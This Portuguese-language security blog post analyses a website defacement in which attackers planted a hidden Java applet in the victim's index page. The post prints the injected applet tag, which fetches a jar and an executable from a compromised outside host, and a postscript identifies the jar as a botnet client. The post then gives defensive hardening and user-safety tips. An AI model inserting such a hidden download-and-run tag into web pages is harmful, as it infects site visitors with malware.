Defacement para propagar pragas. Alguma novidade ?

Tags: , , , , , ,

Uma amiga foi surpreendida com um defacement em seu site. Até aí algo normal nos dias de hoje. Acontece que ela me passou uma informação bem interessante “A necessidade quanto a instalação do Java, última versão, para acessar o site”.

Mas como assim ?! Sites comuns estão rodando applets ou viram home-backing ?

Nops, nada disso.

Analisando o código html que foi postado no index.html da vítima, nós percebemos que a “molecada” ficou malandra. Vejam só:

<APPLET CODE = “Java.class” ARCHIVE = “http://fruru.jp/wp-includes/js/crop/atualizacao/Java.jar” WIDTH = “0” HEIGHT = “0”> <PARAM NAME = “url” VALUE = “http://fruru.jp/wp-includes/js/crop/atualizacao/atualizacao.exe”><PARAM NAME = “fn” VALUE = “javaw.exe”> <PARAM NAME = “rd” VALUE = “./indexx.php”></APPLET>

Infelizmente o host japonês tirou o site do ar e não podemos baixar o java.jar para iniciarmos o processo de análise. Mas as dicas são as seguintes:

  • Tomem cuidado com os seus projetos web e façam um hardware adequado. Estou falando de instalar php-sushosin, atualização de pacotes e até mesmo em utilizar o Incapsula como frontend. Falamos disso no curso de segurança focado em wordpress, o qual rolou neste sábado.
  • Não saíam instalado tudo que o seu browser manda. Vai que é uma praga virtual, como foi o caso deste carinha.
  • E por último, anti-vírus + firewall instalados nos seu computador = mitigação de problemas.

que a força esteja com vocês.

P.S.: pesquisamos um pouco mais sobre o conteúdo deste arquivo java.jar, e descobrirmos que ele é um client de uma botnet. Maneiro hein..

VEJA TAMBÉM

Google Drive e sua fantástica conta de 1TB por 9.90/mês Como vocês, sou um estudante da área. Possuo milhares de livros, papers e vídeos. Junto isso a centena de ferramentas para realização de testes que acabei acumulando nestes últimos 5 anos. Estou fa...
Nmap/Ncat Portable – show de bola Acabei de saber que o excelente time de desenvolvimento do Nmap/Ntcat acaba de lançar uma versão portável para ambos os produtos, rodando em ambiente Windows. Esta nova versão é compatível com pratica...
China, o país com mais Internautas, Hackers e Crackers no mundo. A China sem dúvida alguma, é uma dos maiores países do mundo, seja em número de habitantes, da quantidade de dinheiro, exportação de produtos e agora, de internautas, que hoje já somam mais de 400 mil...
COMPARTILHE ESTE ARTIGO

COMENTÁRIOS

4 comentários em “Defacement para propagar pragas. Alguma novidade ?

DEIXAR UM COMENTÁRIO

MENU